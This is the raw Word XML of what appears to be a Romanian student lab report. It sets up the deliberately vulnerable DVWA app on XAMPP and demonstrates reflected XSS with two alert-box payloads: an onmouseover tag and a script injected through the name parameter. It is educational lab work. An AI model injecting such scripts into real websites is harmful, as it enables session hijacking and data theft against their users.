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13AC4" w14:textId="447C8BAB" w:rsidR="008E6804" w:rsidRDefault="008E6804">
      <w:bookmarkStart w:id="0" w:name="_Hlk160117854"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="336B460C" wp14:editId="0CC55534">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1002030" cy="570865"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="16426" y="0"/>
                <wp:lineTo x="0" y="1442"/>
                <wp:lineTo x="0" y="15858"/>
                <wp:lineTo x="7392" y="20903"/>
                <wp:lineTo x="17247" y="20903"/>
                <wp:lineTo x="21354" y="16578"/>
                <wp:lineTo x="21354" y="721"/>
                <wp:lineTo x="20943" y="0"/>
                <wp:lineTo x="16426" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="198175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57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3DC1A" w14:textId="746B3C2F" w:rsidR="008E6804" w:rsidRDefault="008E6804"/>
    <w:p w14:paraId="5E46A9E5" w14:textId="77777777" w:rsidR="008E6804" w:rsidRDefault="008E6804"/>
    <w:p w14:paraId="5D67EA32" w14:textId="07457659" w:rsidR="008B1B98" w:rsidRDefault="00F64D23">
      <w:r>
        <w:t>Se instaleaza local DVWA</w:t>
      </w:r>
      <w:r w:rsidR="00FC60DC">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00FC60DC" w:rsidRPr="007546DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>https://github.com/digininja/DVWA</w:t>
      </w:r>
      <w:r w:rsidR="00FC60DC">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2554901F" w14:textId="77777777" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="35D8972E" w14:textId="5656182E" w:rsidR="00F64D23" w:rsidRDefault="00F64D23">
      <w:r w:rsidRPr="00F64D23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="403CBA78" wp14:editId="3FEA91D3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6626</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4810125" cy="3698875"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21470"/>
                <wp:lineTo x="21557" y="21470"/>
                <wp:lineTo x="21557" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="134218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87734" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4810125" cy="3698875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="361CF2A1" w14:textId="1C1845A9" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="586B6B1B" w14:textId="1A539DA9" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="1EC34AC9" w14:textId="77777777" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="61440D20" w14:textId="77777777" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="5ECD643C" w14:textId="77777777" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="62A20982" w14:textId="77777777" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="0E104FE8" w14:textId="77777777" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="0FD3C7E4" w14:textId="77777777" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="2F6AF0D6" w14:textId="77777777" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="645D2AB6" w14:textId="77777777" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="5C079D53" w14:textId="77777777" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="3AD34CA6" w14:textId="77777777" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="2E86DC7F" w14:textId="77777777" w:rsidR="008E6804" w:rsidRDefault="008E6804"/>
    <w:p w14:paraId="011E6BAC" w14:textId="6893E26D" w:rsidR="00F64D23" w:rsidRDefault="00F64D23">
      <w:r>
        <w:t>Se va configura XAMPP cu Apache si baza de date MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDEBCBF" w14:textId="14D42740" w:rsidR="00F64D23" w:rsidRDefault="00F64D23">
      <w:r w:rsidRPr="00F64D23">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49CB47D6" wp14:editId="29F28756">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>72252</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3609340" cy="2307590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21398"/>
                <wp:lineTo x="21433" y="21398"/>
                <wp:lineTo x="21433" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="82581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12242" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3609340" cy="2307590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7BC932" w14:textId="24EBBC4C" w:rsidR="00F64D23" w:rsidRDefault="00F64D23"/>
    <w:p w14:paraId="65A05492" w14:textId="77777777" w:rsidR="006A5DDF" w:rsidRDefault="006A5DDF"/>
    <w:p w14:paraId="75A3F482" w14:textId="77777777" w:rsidR="006A5DDF" w:rsidRDefault="006A5DDF"/>
    <w:p w14:paraId="3AFF683F" w14:textId="77777777" w:rsidR="006A5DDF" w:rsidRDefault="006A5DDF"/>
    <w:p w14:paraId="39F32DBD" w14:textId="77777777" w:rsidR="006A5DDF" w:rsidRDefault="006A5DDF"/>
    <w:p w14:paraId="2D09FC1C" w14:textId="77777777" w:rsidR="006A5DDF" w:rsidRDefault="006A5DDF"/>
    <w:p w14:paraId="35E9D3C8" w14:textId="77777777" w:rsidR="006A5DDF" w:rsidRDefault="006A5DDF"/>
    <w:p w14:paraId="37D8C791" w14:textId="77777777" w:rsidR="006A5DDF" w:rsidRDefault="006A5DDF"/>
    <w:p w14:paraId="759F5E6F" w14:textId="77777777" w:rsidR="006A5DDF" w:rsidRDefault="006A5DDF"/>
    <w:p w14:paraId="47C363C6" w14:textId="2CC2FFB3" w:rsidR="006A5DDF" w:rsidRDefault="008E6804" w:rsidP="008E6804">
      <w:r w:rsidRPr="006A5DDF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1DD75C3C" wp14:editId="3488F6D8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>503657</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3971290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21448"/>
                <wp:lineTo x="21531" y="21448"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="1492083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83902"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1290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Fisierul de configurare va fi modificat conform necesitatilor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339164BC" w14:textId="462E02A2" w:rsidR="008E6804" w:rsidRDefault="008E6804" w:rsidP="008E6804"/>
    <w:p w14:paraId="7E603353" w14:textId="77777777" w:rsidR="008E6804" w:rsidRDefault="008E6804" w:rsidP="008E6804"/>
    <w:p w14:paraId="06832BAC" w14:textId="77777777" w:rsidR="008E6804" w:rsidRDefault="008E6804" w:rsidP="008E6804"/>
    <w:p w14:paraId="355398C2" w14:textId="66C3C9A0" w:rsidR="008E6804" w:rsidRDefault="008E6804" w:rsidP="008E6804">
      <w:r>
        <w:t>Este necesara realizarea setup-ului si activarea tuturor functiilor in fisierul php.ini.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D6550" w14:textId="77777777" w:rsidR="008E6804" w:rsidRDefault="008E6804" w:rsidP="008E6804"/>
    <w:p w14:paraId="36329DAB" w14:textId="45AF898E" w:rsidR="008E6804" w:rsidRDefault="008E6804" w:rsidP="008E6804">
      <w:r>
        <w:t>Ulterior, dupa finalizare, se selecteaza gradul dorit de securitate a vulnerabilitatilor</w:t>
      </w:r>
      <w:r w:rsidR="00FC60DC">
        <w:t xml:space="preserve"> (in acest caz, lowest – unde vulnerabilitatile sunt ridicate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC9BC7F" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="2D59E826" w14:textId="6238D697" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="092E5A04" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="3968C5FA" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="0AEC8A88" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="0878084A" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="36EFA473" w14:textId="59F6FFF0" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19A7970A" wp14:editId="1E2BBC7F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4710430" cy="4885055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21479"/>
                <wp:lineTo x="21489" y="21479"/>
                <wp:lineTo x="21489" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="1252882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0430" cy="4885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470848" w14:textId="34603FE4" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="410A42E9" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="7647D679" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="2304B6FA" w14:textId="553128CC" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="31C3BB9A" w14:textId="0C132363" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="62CA17B8" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="680C1925" w14:textId="02202B2E" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="77703782" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="7024743E" w14:textId="2A258726" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="3F3F3842" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="5A99923B" w14:textId="50DE6DC2" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="69846439" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="61D28C97" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="7276126E" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="4E3D7ED9" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="0D4E0760" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="3FB7EA76" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="63F3E3C7" w14:textId="77777777" w:rsidR="004F5719" w:rsidRDefault="004F5719" w:rsidP="008E6804"/>
    <w:p w14:paraId="014699FF" w14:textId="77777777" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="50B53875" w14:textId="77777777" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="6BF559A2" w14:textId="77777777" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="4DB5143F" w14:textId="77777777" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="604DE5D1" w14:textId="77777777" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="0774C778" w14:textId="77777777" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="0B9F8F2D" w14:textId="77777777" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="7041B6D1" w14:textId="77777777" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="7B9055CD" w14:textId="77777777" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="73BA470B" w14:textId="77777777" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="70ADB646" w14:textId="77777777" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="006B517D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Executare comenzi vulnerabilitate XSS (de tip reflected). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352041AC" w14:textId="4E7D6E96" w:rsidR="004F5719" w:rsidRDefault="006B517D" w:rsidP="008E6804">
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="006B517D">
        <w:t>XSS reflectat este o vulnerabilitate de securitate web in care un atacator injecteaza un script malitios in raspunsul unui site web care este reflectat inapoi in browserul utilizatorului. Atacul necesita interactiunea utilizatorului, cum ar fi apasarea unui link malitios, si poate duce la deturnarea sesiunii sau la dezvaluirea de informatii sensibile. Prevenirea include validarea intrarilor, codificarea iesirii si utilizarea antetelor din Politica de securitate a continutului.</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FB71B1" w14:textId="77777777" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="3422EAA7" w14:textId="3CAAD823" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="00D51003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006B517D">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26075B1D" wp14:editId="0DDF68BF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>336676</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3060700"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21510"/>
                <wp:lineTo x="21531" y="21510"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="141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0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14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cod injectat: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D51003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Buna &lt;b onmouseover=alert('StudentUTM')&gt;click me!&lt;/b&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B411788" w14:textId="27DDD37B" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="3676EA40" w14:textId="24485D7E" w:rsidR="004F5719" w:rsidRDefault="006B517D" w:rsidP="008E6804">
      <w:r>
        <w:t>Codul utilzeaza event-ul "onmouseover" intr-o eticheta HTML. Cand mouseul este trecut peste text-ul "click me!", codul din atributul "onmouseover" se va executa (in acest caz o alerta js).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0ECD41" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804"/>
    <w:p w14:paraId="52E301BE" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804"/>
    <w:p w14:paraId="07E2311D" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804"/>
    <w:p w14:paraId="36BD8EE6" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804"/>
    <w:p w14:paraId="5FC921B1" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804"/>
    <w:p w14:paraId="217504ED" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804"/>
    <w:p w14:paraId="4A48A531" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804"/>
    <w:p w14:paraId="025C2B14" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804"/>
    <w:p w14:paraId="42F38C2A" w14:textId="5FF62E54" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="00D51003">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">De asemenea, se poate introduce direct in bara web, un script ce afiseaza numele dorit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CFFC59" w14:textId="150AE7FC" w:rsidR="006B517D" w:rsidRDefault="006B517D" w:rsidP="008E6804"/>
    <w:p w14:paraId="35B9D08F" w14:textId="07A01B6A" w:rsidR="006B517D" w:rsidRDefault="00D51003" w:rsidP="008E6804">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B517D">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68BFD9C2" wp14:editId="701C02FE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="2944495"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21521"/>
                <wp:lineTo x="21531" y="21521"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="62794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668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14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cod: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D51003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>name=&lt;script&gt;alert("Armin")&lt;/script</w:t>
      </w:r>
      <w:r w:rsidRPr="00D51003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728E7F14" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3353CB09" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286999DF" w14:textId="1059D9B6" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25316092" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463A762A" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21EBEC36" w14:textId="77777777" w:rsidR="00D51003" w:rsidRDefault="00D51003" w:rsidP="008E6804">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28F0D0B2" w14:textId="19425E41" w:rsidR="00C6492F" w:rsidRDefault="00D51003" w:rsidP="00C6492F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D51003">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EC282C8" wp14:editId="41DE2161">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>717550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3247390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21414"/>
                <wp:lineTo x="21531" y="21414"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="164328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62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14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Codul </w:t>
      </w:r>
      <w:r w:rsidRPr="00D51003">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
